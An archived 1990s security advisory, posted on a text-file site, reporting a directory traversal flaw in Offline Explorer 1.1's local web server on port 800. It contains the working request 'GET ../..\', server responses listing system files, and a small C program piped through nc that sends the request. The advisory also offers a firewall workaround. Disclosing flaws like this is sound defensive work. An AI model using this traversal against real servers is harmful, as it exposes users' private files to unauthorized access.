Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Windows Net Apps :: offlx.txt

Offline Explorer Advisory

     __... .                                                   . ...__
  d$$^^                                                             ^^$$b
.?$;                                                                   ;$$;:;, 
_.                   Offline Explorer Advisory by Wyzewun         ._ ,;:;,, _. 

Offline Explorer as available from is the most popular
Offline Web Browser available. It's fast, flexible, easy to use, and it does
its job well. It is also a *HUGE* security hazard.

Offline Explorer starts a server on port 800, through which one can view the
downloaded webpage(s). So the poor shmuck's cache becomes remotely accessible!
This is a security threat in itself, but it gets even worse: Remote directory
climbing is possible!

Right. Let's try some stuff out...

GET /../ HTTP/1.1
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 57

<HTML><BODY><H1>404 Document Not Found</H1></BODY></HTML>

Nope. Let's try this then...

GET ../ HTTP/1.1
HTTP/1.0 200 OK
Server: Web Downloader 4.1 (Win32)
Content-Type: text/html
Content-Length: 464
<html><head><title>../</title></head><body><h3>Directory of ../</h3><p><hr>
<table><tr><td><img src="/UpFold.gif" valign=middle></td><td><tt>0</td><td>
<tt><a href="..">..</a></td></tr><tr><td><img src="/Folder.gif" valign=middle>
</td><td><tt>0</td><td><tt><a href="localhost">localhost</a></td></tr></table>
<hr><font size=-2><i><b>Offline Explorer 1.1</b> (C) 1998 - 1999, <a href=
"">MetaProducts corp.</a></i></font></body></html>

Righty! So We're on to something! Well... unfortunately, not. We can't do
anything along the lines of 'GET ../../' and something like 'GET ......../'
won't work either. So practically, this means very little. :(

What we *can* tell, however, is that the vulnerability *is* there. We just
need to figure out how to exploit it. And so, we employ Wizdumb's el8
directory climbing with a twist. Like so...

GET ../..\ HTTP/1.1
HTTP/1.0 200 OK
Server: Web Downloader 4.1 (Win32)
Content-Type: text/html
Content-Length: 5048
<html><head><title>../..\</title></head><body><h3>Directory of ../..\</h3><p>
<hr><table><tr><td></td><td><tt>1696</td><td><tt><a href="MSDOS.SYS">MSDOS.SYS
</a></td></tr><tr><td></td><td><tt>1033</td><td><tt><a href="AUTOEXEC.BAT">
AUTOEXEC.BAT</a></td></tr><tr><td></td><td><tt>222390</td><td><tt><a href="IO.
SYS">IO.SYS</a></td></tr><tr><td></td><td><tt>29636</td><td><tt><a href="BOOTL
OG.TXT">BOOTLOG.TXT</a></td></tr><tr><td><img src="/Folder.gif" valign=middle>
</td><td><tt>0</td><td><tt><a href="WINDOWS">WINDOWS</a></td></tr><tr><td><img
src="/Folder.gif" valign=middle></td><td><tt>0</td><td><tt><a href="My
Documents">My Documents</a></td></tr><tr><td><img src="/Folder.gif" valign=

*Snip* (Too damn much of this crud :P)

And there you have it. This was tested on Offline Explorer v1.1, but all
versions prior to version [put here when it exists] are vulnerable. Thanks to
Metaproducts for  As a temporary fix you could
just firewall out port 800 to everyone except localhost.

Also note that Offline Explorer wants to recieve its queries fast, you can't
just telnet in and type your request, so do this or summing...

   [drew@kung-fusion]$ cat > stupid.c << unf
   void main() { printf("GET ../..\\\ HTTP/1.1\n\n"); }
   [drew@kung-fusion]$ gcc stupid.c -o stupid
   [drew@kung-fusion]$ ./stupid | nc 800 > heh.html
   [drew@kung-fusion]$ lynx heh.html
Right. That's all from me for now. HEH, /../ this ../..\ that, I should become
a full time ../ hax0rer! :P Cheers...

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH